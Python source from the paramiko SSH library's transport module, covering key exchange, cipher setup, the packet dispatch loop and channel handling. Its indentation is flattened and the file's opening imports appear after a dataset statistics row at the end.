# * Or it looks like we've hit issue #520 (socket.recv hitting some
# race condition preventing it from timing out correctly), wherein
# our socket and packetizer are both closed (but where we'd
# otherwise be sitting forever on that recv()).
while (
self.is_alive()
and self is not threading.current_thread()
and not self.sock._closed
and not self.packetizer.closed
):
self.join(0.1)
# internals...
def _log(self, level, msg, *args):
if issubclass(type(msg), list):
for m in msg:
self.logger.log(level, m)
else:
self.logger.log(level, msg, *args)
def _get_modulus_pack(self):
"""used by KexGex to find primes for group exchange"""
return self._modulus_pack
def _next_channel(self):
"""you are holding the lock"""
chanid = self._channel_counter
while self._channels.get(chanid) is not None:
self._channel_counter = (self._channel_counter + 1) & 0xffffff
chanid = self._channel_counter
self._channel_counter = (self._channel_counter + 1) & 0xffffff
return chanid
def _unlink_channel(self, chanid):
"""used by a Channel to remove itself from the active channel list"""
self._channels.delete(chanid)
def _send_message(self, data):
self.packetizer.send_message(data)
def _send_user_message(self, data):
"""
send a message, but block if we're in key negotiation. this is used
for user-initiated requests.
"""
start = time.time()
while True:
self.clear_to_send.wait(0.1)
if not self.active:
self._log(
DEBUG, "Dropping user packet because connection is dead."
) # noqa
return
self.clear_to_send_lock.acquire()
if self.clear_to_send.is_set():
break
self.clear_to_send_lock.release()
if time.time() > start + self.clear_to_send_timeout:
raise SSHException(
"Key-exchange timed out waiting for key negotiation"
) # noqa
try:
self._send_message(data)
finally:
self.clear_to_send_lock.release()
def _set_K_H(self, k, h):
"""
Used by a kex obj to set the K (root key) and H (exchange hash).
"""
self.K = k
self.H = h
if self.session_id is None:
self.session_id = h
def _expect_packet(self, *ptypes):
"""
Used by a kex obj to register the next packet type it expects to see.
"""
self._expected_packet = tuple(ptypes)
def _verify_key(self, host_key, sig):
key = self._key_info[self.host_key_type](Message(host_key))
if key is None:
raise SSHException("Unknown host key type")
if not key.verify_ssh_sig(self.H, Message(sig)):
raise SSHException(
"Signature verification ({}) failed.".format(
self.host_key_type
)
) # noqa
self.host_key = key
def _compute_key(self, id, nbytes):
"""id is 'A' - 'F' for the various keys used by ssh"""
m = Message()
m.add_mpint(self.K)
m.add_bytes(self.H)
m.add_byte(b(id))
m.add_bytes(self.session_id)
# Fallback to SHA1 for kex engines that fail to specify a hex
# algorithm, or for e.g. transport tests that don't run kexinit.
hash_algo = getattr(self.kex_engine, "hash_algo", None)
hash_select_msg = "kex engine {} specified hash_algo {!r}".format(
self.kex_engine.__class__.__name__, hash_algo
)
if hash_algo is None:
hash_algo = sha1
hash_select_msg += ", falling back to sha1"
if not hasattr(self, "_logged_hash_selection"):
self._log(DEBUG, hash_select_msg)
setattr(self, "_logged_hash_selection", True)
out = sofar = hash_algo(m.asbytes()).digest()
while len(out) < nbytes:
m = Message()
m.add_mpint(self.K)
m.add_bytes(self.H)
m.add_bytes(sofar)
digest = hash_algo(m.asbytes()).digest()
out += digest
sofar += digest
return out[:nbytes]
def _get_cipher(self, name, key, iv, operation):
if name not in self._cipher_info:
raise SSHException("Unknown client cipher " + name)
else:
cipher = Cipher(
self._cipher_info[name]["class"](key),
self._cipher_info[name]["mode"](iv),
backend=default_backend(),
)
if operation is self._ENCRYPT:
return cipher.encryptor()
else:
return cipher.decryptor()
def _set_forward_agent_handler(self, handler):
if handler is None:
def default_handler(channel):
self._queue_incoming_channel(channel)
self._forward_agent_handler = default_handler
else:
self._forward_agent_handler = handler
def _set_x11_handler(self, handler):
# only called if a channel has turned on x11 forwarding
if handler is None:
# by default, use the same mechanism as accept()
def default_handler(channel, src_addr_port):
self._queue_incoming_channel(channel)
self._x11_handler = default_handler
else:
self._x11_handler = handler
def _queue_incoming_channel(self, channel):
self.lock.acquire()
try:
self.server_accepts.append(channel)
self.server_accept_cv.notify()
finally:
self.lock.release()
def _sanitize_window_size(self, window_size):
if window_size is None:
window_size = self.default_window_size
return clamp_value(MIN_WINDOW_SIZE, window_size, MAX_WINDOW_SIZE)
def _sanitize_packet_size(self, max_packet_size):
if max_packet_size is None:
max_packet_size = self.default_max_packet_size
return clamp_value(MIN_PACKET_SIZE, max_packet_size, MAX_WINDOW_SIZE)
def _ensure_authed(self, ptype, message):
"""
Checks message type against current auth state.
If server mode, and auth has not succeeded, and the message is of a
post-auth type (channel open or global request) an appropriate error
response Message is crafted and returned to caller for sending.
Otherwise (client mode, authed, or pre-auth message) returns None.
"""
if (
not self.server_mode
or ptype <= HIGHEST_USERAUTH_MESSAGE_ID
or self.is_authenticated()
):
return None
# WELP. We must be dealing with someone trying to do non-auth things
# without being authed. Tell them off, based on message class.
reply = Message()
# Global requests have no details, just failure.
if ptype == MSG_GLOBAL_REQUEST:
reply.add_byte(cMSG_REQUEST_FAILURE)
# Channel opens let us reject w/ a specific type + message.
elif ptype == MSG_CHANNEL_OPEN:
kind = message.get_text() # noqa
chanid = message.get_int()
reply.add_byte(cMSG_CHANNEL_OPEN_FAILURE)
reply.add_int(chanid)
reply.add_int(OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED)
reply.add_string("")
reply.add_string("en")
# NOTE: Post-open channel messages do not need checking; the above will
# reject attemps to open channels, meaning that even if a malicious
# user tries to send a MSG_CHANNEL_REQUEST, it will simply fall under
# the logic that handles unknown channel IDs (as the channel list will
# be empty.)
return reply
def run(self):
# (use the exposed "run" method, because if we specify a thread target
# of a private method, threading.Thread will keep a reference to it
# indefinitely, creating a GC cycle and not letting Transport ever be
# GC'd. it's a bug in Thread.)
# Hold reference to 'sys' so we can test sys.modules to detect
# interpreter shutdown.
self.sys = sys
# active=True occurs before the thread is launched, to avoid a race
_active_threads.append(self)
tid = hex(long(id(self)) & xffffffff)
if self.server_mode:
self._log(DEBUG, "starting thread (server mode): {}".format(tid))
else:
self._log(DEBUG, "starting thread (client mode): {}".format(tid))
try:
try:
self.packetizer.write_all(b(self.local_version + "\r\n"))
self._log(
DEBUG,
"Local version/idstring: {}".format(self.local_version),
) # noqa
self._check_banner()
# The above is actually very much part of the handshake, but
# sometimes the banner can be read but the machine is not
# responding, for example when the remote ssh daemon is loaded
# in to memory but we can not read from the disk/spawn a new
# shell.
# Make sure we can specify a timeout for the initial handshake.
# Re-use the banner timeout for now.
self.packetizer.start_handshake(self.handshake_timeout)
self._send_kex_init()
self._expect_packet(MSG_KEXINIT)
while self.active:
if self.packetizer.need_rekey() and not self.in_kex:
self._send_kex_init()
try:
ptype, m = self.packetizer.read_message()
except NeedRekeyException:
continue
if ptype == MSG_IGNORE:
continue
elif ptype == MSG_DISCONNECT:
self._parse_disconnect(m)
break
elif ptype == MSG_DEBUG:
self._parse_debug(m)
continue
if len(self._expected_packet) > 0:
if ptype not in self._expected_packet:
raise SSHException(
"Expecting packet from {!r}, got {:d}".format(
self._expected_packet, ptype
)
) # noqa
self._expected_packet = tuple()
if (ptype >= 30) and (ptype <= 41):
self.kex_engine.parse_next(ptype, m)
continue
if ptype in self._handler_table:
error_msg = self._ensure_authed(ptype, m)
if error_msg:
self._send_message(error_msg)
else:
self._handler_table[ptype](self, m)
elif ptype in self._channel_handler_table:
chanid = m.get_int()
chan = self._channels.get(chanid)
if chan is not None:
self._channel_handler_table[ptype](chan, m)
elif chanid in self.channels_seen:
self._log(
DEBUG,
"Ignoring message for dead channel {:d}".format( # noqa
chanid
),
)
else:
self._log(
ERROR,
"Channel request for unknown channel {:d}".format( # noqa
chanid
),
)
break
elif (
self.auth_handler is not None
and ptype in self.auth_handler._handler_table
):
handler = self.auth_handler._handler_table[ptype]
handler(self.auth_handler, m)
if len(self._expected_packet) > 0:
continue
else:
# Respond with "I don't implement this particular
# message type" message (unless the message type was
# itself literally MSG_UNIMPLEMENTED, in which case, we
# just shut up to avoid causing a useless loop).
name = MSG_NAMES[ptype]
warning = "Oops, unhandled type {} ({!r})".format(
ptype, name
)
self._log(WARNING, warning)
if ptype != MSG_UNIMPLEMENTED:
msg = Message()
msg.add_byte(cMSG_UNIMPLEMENTED)
msg.add_int(m.seqno)
self._send_message(msg)
self.packetizer.complete_handshake()
except SSHException as e:
self._log(ERROR, "Exception: " + str(e))
self._log(ERROR, util.tb_strings())
self.saved_exception = e
except EOFError as e:
self._log(DEBUG, "EOF in transport thread")
self.saved_exception = e
except socket.error as e:
if type(e.args) is tuple:
if e.args:
emsg = "{} ({:d})".format(e.args[1], e.args[0])
else: # empty tuple, e.g. socket.timeout
emsg = str(e) or repr(e)
else:
emsg = e.args
self._log(ERROR, "Socket exception: " + emsg)
self.saved_exception = e
except Exception as e:
self._log(ERROR, "Unknown exception: " + str(e))
self._log(ERROR, util.tb_strings())
self.saved_exception = e
_active_threads.remove(self)
for chan in list(self._channels.values()):
chan._unlink()
if self.active:
self.active = False
self.packetizer.close()
if self.completion_event is not None:
self.completion_event.set()
if self.auth_handler is not None:
self.auth_handler.abort()
for event in self.channel_events.values():
event.set()
try:
self.lock.acquire()
self.server_accept_cv.notify()
finally:
self.lock.release()
self.sock.close()
except:
# Don't raise spurious 'NoneType has no attribute X' errors when we
# wake up during interpreter shutdown. Or rather -- raise
# everything *if* sys.modules (used as a convenient sentinel)
# appears to still exist.
if self.sys.modules is not None:
raise
def _log_agreement(self, which, local, remote):
# Log useful, non-duplicative line re: an agreed-upon algorithm.
# Old code implied algorithms could be asymmetrical (different for
# inbound vs outbound) so we preserve that possibility.
msg = "{} agreed: ".format(which)
if local == remote:
msg += local
else:
msg += "local={}, remote={}".format(local, remote)
self._log(DEBUG, msg)
# protocol stages
def _negotiate_keys(self, m):
# throws SSHException on anything unusual
self.clear_to_send_lock.acquire()
try:
self.clear_to_send.clear()
finally:
self.clear_to_send_lock.release()
if self.local_kex_init is None:
# remote side wants to renegotiate
self._send_kex_init()
self._parse_kex_init(m)
self.kex_engine.start_kex()
def _check_banner(self):
# this is slow, but we only have to do it once
for i in range(100):
# give them 15 seconds for the first line, then just 2 seconds
# each additional line. (some sites have very high latency.)
if i == 0:
timeout = self.banner_timeout
else:
timeout = 2
try:
buf = self.packetizer.readline(timeout)
except ProxyCommandFailure:
raise
except Exception as e:
raise SSHException(
"Error reading SSH protocol banner" + str(e)
)
if buf[:4] == "SSH-":
break
self._log(DEBUG, "Banner: " + buf)
if buf[:4] != "SSH-":
raise SSHException('Indecipherable protocol version "' + buf + '"')
# save this server version string for later
self.remote_version = buf
self._log(DEBUG, "Remote version/idstring: {}".format(buf))
# pull off any attached comment
# NOTE: comment used to be stored in a variable and then...never used.
# since 2003. ca 877cd974b8182d26fa76d566072917ea67b64e67
i = buf.find(" ")
if i >= 0:
buf = buf[:i]
# parse out version string and make sure it matches
segs = buf.split("-", 2)
if len(segs) < 3:
raise SSHException("Invalid SSH banner")
version = segs[1]
client = segs[2]
if version != "1.99" and version != "2.0":
msg = "Incompatible version ({} instead of 2.0)"
raise SSHException(msg.format(version))
msg = "Connected (version {}, client {})".format(version, client)
self._log(INFO, msg)
def _send_kex_init(self):
"""
announce to the other side that we'd like to negotiate keys, and what
kind of key negotiation we support.
"""
self.clear_to_send_lock.acquire()
try:
self.clear_to_send.clear()
finally:
self.clear_to_send_lock.release()
self.gss_kex_used = False
self.in_kex = True
if self.server_mode:
mp_required_prefix = "diffie-hellman-group-exchange-sha"
kex_mp = [
k
for k in self._preferred_kex
if k.startswith(mp_required_prefix)
]
if (self._modulus_pack is None) and (len(kex_mp) > 0):
# can't do group-exchange if we don't have a pack of potential
# primes
pkex = [
k
for k in self.get_security_options().kex
if not k.startswith(mp_required_prefix)
]
self.get_security_options().kex = pkex
available_server_keys = list(
filter(
list(self.server_key_dict.keys()).__contains__,
self._preferred_keys,
)
)
else:
available_server_keys = self._preferred_keys
m = Message()
m.add_byte(cMSG_KEXINIT)
m.add_bytes(os.urandom(16))
m.add_list(self._preferred_kex)
m.add_list(available_server_keys)
m.add_list(self._preferred_ciphers)
m.add_list(self._preferred_ciphers)
m.add_list(self._preferred_macs)
m.add_list(self._preferred_macs)
m.add_list(self._preferred_compression)
m.add_list(self._preferred_compression)
m.add_string(bytes())
m.add_string(bytes())
m.add_boolean(False)
m.add_int(0)
# save a copy for later (needed to compute a hash)
self.local_kex_init = m.asbytes()
self._send_message(m)
def _parse_kex_init(self, m):
m.get_bytes(16) # cookie, discarded
kex_algo_list = m.get_list()
server_key_algo_list = m.get_list()
client_encrypt_algo_list = m.get_list()
server_encrypt_algo_list = m.get_list()
client_mac_algo_list = m.get_list()
server_mac_algo_list = m.get_list()
client_compress_algo_list = m.get_list()
server_compress_algo_list = m.get_list()
client_lang_list = m.get_list()
server_lang_list = m.get_list()
kex_follows = m.get_boolean()
m.get_int() # unused
self._log(
DEBUG,
"kex algos:"
+ str(kex_algo_list)
+ " server key:"
+ str(server_key_algo_list)
+ " client encrypt:"
+ str(client_encrypt_algo_list)
+ " server encrypt:"
+ str(server_encrypt_algo_list)
+ " client mac:"
+ str(client_mac_algo_list)
+ " server mac:"
+ str(server_mac_algo_list)
+ " client compress:"
+ str(client_compress_algo_list)
+ " server compress:"
+ str(server_compress_algo_list)
+ " client lang:"
+ str(client_lang_list)
+ " server lang:"
+ str(server_lang_list)
+ " kex follows?"
+ str(kex_follows),
)
# as a server, we pick the first item in the client's list that we
# support.
# as a client, we pick the first item in our list that the server
# supports.
if self.server_mode:
agreed_kex = list(
filter(self._preferred_kex.__contains__, kex_algo_list)
)
else:
agreed_kex = list(
filter(kex_algo_list.__contains__, self._preferred_kex)
)
if len(agreed_kex) == 0:
raise SSHException(
"Incompatible ssh peer (no acceptable kex algorithm)"
) # noqa
self.kex_engine = self._kex_info[agreed_kex[0]](self)
self._log(DEBUG, "Kex agreed: {}".format(agreed_kex[0]))
if self.server_mode:
available_server_keys = list(
filter(
list(self.server_key_dict.keys()).__contains__,
self._preferred_keys,
)
)
agreed_keys = list(
filter(
available_server_keys.__contains__, server_key_algo_list
)
)
else:
agreed_keys = list(
filter(server_key_algo_list.__contains__, self._preferred_keys)
)
if len(agreed_keys) == 0:
raise SSHException(
"Incompatible ssh peer (no acceptable host key)"
) # noqa
self.host_key_type = agreed_keys[0]
if self.server_mode and (self.get_server_key() is None):
raise SSHException(
"Incompatible ssh peer (can't match requested host key type)"
) # noqa
self._log_agreement("HostKey", agreed_keys[0], agreed_keys[0])
if self.server_mode:
agreed_local_ciphers = list(
filter(
self._preferred_ciphers.__contains__,
server_encrypt_algo_list,
)
)
agreed_remote_ciphers = list(
filter(
self._preferred_ciphers.__contains__,
client_encrypt_algo_list,
)
)
else:
agreed_local_ciphers = list(
filter(
client_encrypt_algo_list.__contains__,
self._preferred_ciphers,
)
)
agreed_remote_ciphers = list(
filter(
server_encrypt_algo_list.__contains__,
self._preferred_ciphers,
)
)
if len(agreed_local_ciphers) == 0 or len(agreed_remote_ciphers) == 0:
raise SSHException(
"Incompatible ssh server (no acceptable ciphers)"
) # noqa
self.local_cipher = agreed_local_ciphers[0]
self.remote_cipher = agreed_remote_ciphers[0]
self._log_agreement(
"Cipher", local=self.local_cipher, remote=self.remote_cipher
)
if self.server_mode:
agreed_remote_macs = list(
filter(self._preferred_macs.__contains__, client_mac_algo_list)
)
agreed_local_macs = list(
filter(self._preferred_macs.__contains__, server_mac_algo_list)
)
else:
agreed_local_macs = list(
filter(client_mac_algo_list.__contains__, self._preferred_macs)
)
agreed_remote_macs = list(
filter(server_mac_algo_list.__contains__, self._preferred_macs)
)
if (len(agreed_local_macs) == 0) or (len(agreed_remote_macs) == 0):
raise SSHException("Incompatible ssh server (no acceptable macs)")
self.local_mac = agreed_local_macs[0]
self.remote_mac = agreed_remote_macs[0]
self._log_agreement(
"MAC", local=self.local_mac, remote=self.remote_mac
)
if self.server_mode:
agreed_remote_compression = list(
filter(
self._preferred_compression.__contains__,
client_compress_algo_list,
)
)
agreed_local_compression = list(
filter(
self._preferred_compression.__contains__,
server_compress_algo_list,
)
)
else:
agreed_local_compression = list(
filter(
client_compress_algo_list.__contains__,
self._preferred_compression,
)
)
agreed_remote_compression = list(
filter(
server_compress_algo_list.__contains__,
self._preferred_compression,
)
)
if (
len(agreed_local_compression) == 0
or len(agreed_remote_compression) == 0
):
msg = "Incompatible ssh server (no acceptable compression)"
msg += " {!r} {!r} {!r}"
raise SSHException(
msg.format(
agreed_local_compression,
agreed_remote_compression,
self._preferred_compression,
)
)
self.local_compression = agreed_local_compression[0]
self.remote_compression = agreed_remote_compression[0]
self._log_agreement(
"Compression",
local=self.local_compression,
remote=self.remote_compression,
)
# save for computing hash later...
# now wait! openssh has a bug (and others might too) where there are
# actually some extra bytes (one NUL byte in openssh's case) added to
# the end of the packet but not parsed. turns out we need to throw
# away those bytes because they aren't part of the hash.
self.remote_kex_init = cMSG_KEXINIT + m.get_so_far()
def _activate_inbound(self):
"""switch on newly negotiated encryption parameters for
inbound traffic"""
block_size = self._cipher_info[self.remote_cipher]["block-size"]
if self.server_mode:
IV_in = self._compute_key("A", block_size)
key_in = self._compute_key(
"C", self._cipher_info[self.remote_cipher]["key-size"]
)
else:
IV_in = self._compute_key("B", block_size)
key_in = self._compute_key(
"D", self._cipher_info[self.remote_cipher]["key-size"]
)
engine = self._get_cipher(
self.remote_cipher, key_in, IV_in, self._DECRYPT
)
mac_size = self._mac_info[self.remote_mac]["size"]
mac_engine = self._mac_info[self.remote_mac]["class"]
# initial mac keys are done in the hash's natural size (not the
# potentially truncated transmission size)
if self.server_mode:
mac_key = self._compute_key("E", mac_engine().digest_size)
else:
mac_key = self._compute_key("F", mac_engine().digest_size)
self.packetizer.set_inbound_cipher(
engine, block_size, mac_engine, mac_size, mac_key
)
compress_in = self._compression_info[self.remote_compression][1]
if compress_in is not None and (
self.remote_compression != "zlib@openssh.com" or self.authenticated
):
self._log(DEBUG, "Switching on inbound compression ...")
self.packetizer.set_inbound_compressor(compress_in())
def _activate_outbound(self):
"""switch on newly negotiated encryption parameters for
outbound traffic"""
m = Message()
m.add_byte(cMSG_NEWKEYS)
self._send_message(m)
block_size = self._cipher_info[self.local_cipher]["block-size"]
if self.server_mode:
IV_out = self._compute_key("B", block_size)
key_out = self._compute_key(
"D", self._cipher_info[self.local_cipher]["key-size"]
)
else:
IV_out = self._compute_key("A", block_size)
key_out = self._compute_key(
"C", self._cipher_info[self.local_cipher]["key-size"]
)
engine = self._get_cipher(
self.local_cipher, key_out, IV_out, self._ENCRYPT
)
mac_size = self._mac_info[self.local_mac]["size"]
mac_engine = self._mac_info[self.local_mac]["class"]
# initial mac keys are done in the hash's natural size (not the
# potentially truncated transmission size)
if self.server_mode:
mac_key = self._compute_key("F", mac_engine().digest_size)
else:
mac_key = self._compute_key("E", mac_engine().digest_size)
sdctr = self.local_cipher.endswith("-ctr")
self.packetizer.set_outbound_cipher(
engine, block_size, mac_engine, mac_size, mac_key, sdctr
)
compress_out = self._compression_info[self.local_compression][0]
if compress_out is not None and (
self.local_compression != "zlib@openssh.com" or self.authenticated
):
self._log(DEBUG, "Switching on outbound compression ...")
self.packetizer.set_outbound_compressor(compress_out())
if not self.packetizer.need_rekey():
self.in_kex = False
# we always expect to receive NEWKEYS now
self._expect_packet(MSG_NEWKEYS)
def _auth_trigger(self):
self.authenticated = True
# delayed initiation of compression
if self.local_compression == "zlib@openssh.com":
compress_out = self._compression_info[self.local_compression][0]
self._log(DEBUG, "Switching on outbound compression ...")
self.packetizer.set_outbound_compressor(compress_out())
if self.remote_compression == "zlib@openssh.com":
compress_in = self._compression_info[self.remote_compression][1]
self._log(DEBUG, "Switching on inbound compression ...")
self.packetizer.set_inbound_compressor(compress_in())
def _parse_newkeys(self, m):
self._log(DEBUG, "Switch to new keys ...")
self._activate_inbound()
# can also free a bunch of stuff here
self.local_kex_init = self.remote_kex_init = None
self.K = None
self.kex_engine = None
if self.server_mode and (self.auth_handler is None):
# create auth handler for server mode
self.auth_handler = AuthHandler(self)
if not self.initial_kex_done:
# this was the first key exchange
self.initial_kex_done = True
# send an event?
if self.completion_event is not None:
self.completion_event.set()
# it's now okay to send data again (if this was a re-key)
if not self.packetizer.need_rekey():
self.in_kex = False
self.clear_to_send_lock.acquire()
try:
self.clear_to_send.set()
finally:
self.clear_to_send_lock.release()
return
def _parse_disconnect(self, m):
code = m.get_int()
desc = m.get_text()
self._log(INFO, "Disconnect (code {:d}): {}".format(code, desc))
def _parse_global_request(self, m):
kind = m.get_text()
self._log(DEBUG, 'Received global request "{}"'.format(kind))
want_reply = m.get_boolean()
if not self.server_mode:
self._log(
DEBUG,
'Rejecting "{}" global request from server.'.format(kind),
)
ok = False
elif kind == "tcpip-forward":
address = m.get_text()
port = m.get_int()
ok = self.server_object.check_port_forward_request(address, port)
if ok:
ok = (ok,)
elif kind == "cancel-tcpip-forward":
address = m.get_text()
port = m.get_int()
self.server_object.cancel_port_forward_request(address, port)
ok = True
else:
ok = self.server_object.check_global_request(kind, m)
extra = ()
if type(ok) is tuple:
extra = ok
ok = True
if want_reply:
msg = Message()
if ok:
msg.add_byte(cMSG_REQUEST_SUCCESS)
msg.add(*extra)
else:
msg.add_byte(cMSG_REQUEST_FAILURE)
self._send_message(msg)
def _parse_request_success(self, m):
self._log(DEBUG, "Global request successful.")
self.global_response = m
if self.completion_event is not None:
self.completion_event.set()
def _parse_request_failure(self, m):
self._log(DEBUG, "Global request denied.")
self.global_response = None
if self.completion_event is not None:
self.completion_event.set()
def _parse_channel_open_success(self, m):
chanid = m.get_int()
server_chanid = m.get_int()
server_window_size = m.get_int()
server_max_packet_size = m.get_int()
chan = self._channels.get(chanid)
if chan is None:
self._log(WARNING, "Success for unrequested channel! [??]")
return
self.lock.acquire()
try:
chan._set_remote_channel(
server_chanid, server_window_size, server_max_packet_size
)
self._log(DEBUG, "Secsh channel {:d} opened.".format(chanid))
if chanid in self.channel_events:
self.channel_events[chanid].set()
del self.channel_events[chanid]
finally:
self.lock.release()
return
def _parse_channel_open_failure(self, m):
chanid = m.get_int()
reason = m.get_int()
reason_str = m.get_text()
m.get_text() # ignored language
reason_text = CONNECTION_FAILED_CODE.get(reason, "(unknown code)")
self._log(
ERROR,
"Secsh channel {:d} open FAILED: {}: {}".format(
chanid, reason_str, reason_text
),
)
self.lock.acquire()
try:
self.saved_exception = ChannelException(reason, reason_text)
if chanid in self.channel_events:
self._channels.delete(chanid)
if chanid in self.channel_events:
self.channel_events[chanid].set()
del self.channel_events[chanid]
finally:
self.lock.release()
return
def _parse_channel_open(self, m):
kind = m.get_text()
chanid = m.get_int()
initial_window_size = m.get_int()
max_packet_size = m.get_int()
reject = False
if (
kind == "auth-agent@openssh.com"
and self._forward_agent_handler is not None
):
self._log(DEBUG, "Incoming forward agent connection")
self.lock.acquire()
try:
my_chanid = self._next_channel()
finally:
self.lock.release()
elif (kind == "x11") and (self._x11_handler is not None):
origin_addr = m.get_text()
origin_port = m.get_int()
self._log(
DEBUG,
"Incoming x11 connection from {}:{:d}".format(
origin_addr, origin_port
),
)
self.lock.acquire()
try:
my_chanid = self._next_channel()
finally:
self.lock.release()
elif (kind == "forwarded-tcpip") and (self._tcp_handler is not None):
server_addr = m.get_text()
server_port = m.get_int()
origin_addr = m.get_text()
origin_port = m.get_int()
self._log(
DEBUG,
"Incoming tcp forwarded connection from {}:{:d}".format(
origin_addr, origin_port
),
)
self.lock.acquire()
try:
my_chanid = self._next_channel()
finally:
self.lock.release()
elif not self.server_mode:
self._log(
DEBUG,
'Rejecting "{}" channel request from server.'.format(kind),
)
reject = True
reason = OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
else:
self.lock.acquire()
try:
my_chanid = self._next_channel()
finally:
self.lock.release()
if kind == "direct-tcpip":
# handle direct-tcpip requests coming from the client
dest_addr = m.get_text()
dest_port = m.get_int()
origin_addr = m.get_text()
origin_port = m.get_int()
reason = self.server_object.check_channel_direct_tcpip_request(
my_chanid,
(origin_addr, origin_port),
(dest_addr, dest_port),
)
else:
reason = self.server_object.check_channel_request(
kind, my_chanid
)
if reason != OPEN_SUCCEEDED:
self._log(
DEBUG,
'Rejecting "{}" channel request from client.'.format(kind),
)
reject = True
if reject:
msg = Message()
msg.add_byte(cMSG_CHANNEL_OPEN_FAILURE)
msg.add_int(chanid)
msg.add_int(reason)
msg.add_string("")
msg.add_string("en")
self._send_message(msg)
return
chan = Channel(my_chanid)
self.lock.acquire()
try:
self._channels.put(my_chanid, chan)
self.channels_seen[my_chanid] = True
chan._set_transport(self)
chan._set_window(
self.default_window_size, self.default_max_packet_size
)
chan._set_remote_channel(
chanid, initial_window_size, max_packet_size
)
finally:
self.lock.release()
m = Message()
m.add_byte(cMSG_CHANNEL_OPEN_SUCCESS)
m.add_int(chanid)
m.add_int(my_chanid)
m.add_int(self.default_window_size)
m.add_int(self.default_max_packet_size)
self._send_message(m)
self._log(
DEBUG, "Secsh channel {:d} ({}) opened.".format(my_chanid, kind)
)
if kind == "auth-agent@openssh.com":
self._forward_agent_handler(chan)
elif kind == "x11":
self._x11_handler(chan, (origin_addr, origin_port))
elif kind == "forwarded-tcpip":
chan.origin_addr = (origin_addr, origin_port)
self._tcp_handler(
chan, (origin_addr, origin_port), (server_addr, server_port)
)
else:
self._queue_incoming_channel(chan)
def _parse_debug(self, m):
m.get_boolean() # always_display
msg = m.get_string()
m.get_string() # language
self._log(DEBUG, "Debug msg: {}".format(util.safe_string(msg)))
def _get_subsystem_handler(self, name):
try:
self.lock.acquire()
if name not in self.subsystem_table:
return None, [], {}
return self.subsystem_table[name]
finally:
self.lock.release()
_handler_table = {
MSG_NEWKEYS: _parse_newkeys,
MSG_GLOBAL_REQUEST: _parse_global_request,
MSG_REQUEST_SUCCESS: _parse_request_success,
MSG_REQUEST_FAILURE: _parse_request_failure,
MSG_CHANNEL_OPEN_SUCCESS: _parse_channel_open_success,
MSG_CHANNEL_OPEN_FAILURE: _parse_channel_open_failure,
MSG_CHANNEL_OPEN: _parse_channel_open,
MSG_KEXINIT: _negotiate_keys,
}
_channel_handler_table = {
MSG_CHANNEL_SUCCESS: Channel._request_success,
MSG_CHANNEL_FAILURE: Channel._request_failed,
MSG_CHANNEL_DATA: Channel._feed,
MSG_CHANNEL_EXTENDED_DATA: Channel._feed_extended,
MSG_CHANNEL_WINDOW_ADJUST: Channel._window_adjust,
MSG_CHANNEL_REQUEST: Channel._handle_request,
MSG_CHANNEL_EOF: Channel._handle_eof,
MSG_CHANNEL_CLOSE: Channel._handle_close,
}
class SecurityOptions(object):
"""
Simple object containing the security preferences of an ssh transport.
These are tuples of acceptable ciphers, digests, key types, and key
exchange algorithms, listed in order of preference.
Changing the contents and/or order of these fields affects the underlying
`.Transport` (but only if you change them before starting the session).
If you try to add an algorithm that paramiko doesn't recognize,
``ValueError`` will be raised. If you try to assign something besides a
tuple to one of the fields, ``TypeError`` will be raised.
"""
__slots__ = "_transport"
def __init__(self, transport):
self._transport = transport
def __repr__(self):
"""
Returns a string representation of this object, for debugging.
"""
return "<paramiko.SecurityOptions for {!r}>".format(self._transport)
def _set(self, name, orig, x):
if type(x) is list:
x = tuple(x)
if type(x) is not tuple:
raise TypeError("expected tuple or list")
possible = list(getattr(self._transport, orig).keys())
forbidden = [n for n in x if n not in possible]
if len(forbidden) > 0:
raise ValueError("unknown cipher")
setattr(self._transport, name, x)
@property
def ciphers(self):
"""Symmetric encryption ciphers"""
return self._transport._preferred_ciphers
@ciphers.setter
def ciphers(self, x):
self._set("_preferred_ciphers", "_cipher_info", x)
@property
def digests(self):
"""Digest (one-way hash) algorithms"""
return self._transport._preferred_macs
@digests.setter
def digests(self, x):
self._set("_preferred_macs", "_mac_info", x)
@property
def key_types(self):
"""Public-key algorithms"""
return self._transport._preferred_keys
@key_types.setter
def key_types(self, x):
self._set("_preferred_keys", "_key_info", x)
@property
def kex(self):
"""Key exchange algorithms"""
return self._transport._preferred_kex
@kex.setter
def kex(self, x):
self._set("_preferred_kex", "_kex_info", x)
@property
def compression(self):
"""Compression algorithms"""
return self._transport._preferred_compression
@compression.setter
def compression(self, x):
self._set("_preferred_compression", "_compression_info", x)
class ChannelMap(object):
def __init__(self):
# (id -> Channel)
self._map = weakref.WeakValueDictionary()
self._lock = threading.Lock()
def put(self, chanid, chan):
self._lock.acquire()
try:
self._map[chanid] = chan
finally:
self._lock.release()
def get(self, chanid):
self._lock.acquire()
try:
return self._map.get(chanid, None)
finally:
self._lock.release()
def delete(self, chanid):
self._lock.acquire()
try:
try:
del self._map[chanid]
except KeyError:
pass
finally:
self._lock.release()
def values(self):
self._lock.acquire()
try:
return list(self._map.values())
finally:
self._lock.release()
def __len__(self):
self._lock.acquire()
try:
return len(self._map)
finally:
self._lock.release()
| 38.330488 | 90 | 0.582854 |
from __future__ import print_function
import os
import socket
import sys
import threading
import time
import weakref
from hashlib import md5, sha1, sha256, sha512
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import algorithms, Cipher, modes
import paramiko
from paramiko import util
from paramiko.auth_handler import AuthHandler
from paramiko.ssh_gss import GSSAuth
from paramiko.channel import Channel
from paramiko.common import (
xffffffff,
cMSG_CHANNEL_OPEN,
cMSG_IGNORE,
cMSG_GLOBAL_REQUEST,
DEBUG,
MSG_KEXINIT,
MSG_IGNORE,
MSG_DISCONNECT,
MSG_DEBUG,
ERROR,
WARNING,
cMSG_UNIMPLEMENTED,
INFO,
cMSG_KEXINIT,
cMSG_NEWKEYS,
MSG_NEWKEYS,
cMSG_REQUEST_SUCCESS,
cMSG_REQUEST_FAILURE,
CONNECTION_FAILED_CODE,
OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED,
OPEN_SUCCEEDED,
cMSG_CHANNEL_OPEN_FAILURE,
cMSG_CHANNEL_OPEN_SUCCESS,
MSG_GLOBAL_REQUEST,
MSG_REQUEST_SUCCESS,
MSG_REQUEST_FAILURE,
MSG_CHANNEL_OPEN_SUCCESS,
MSG_CHANNEL_OPEN_FAILURE,
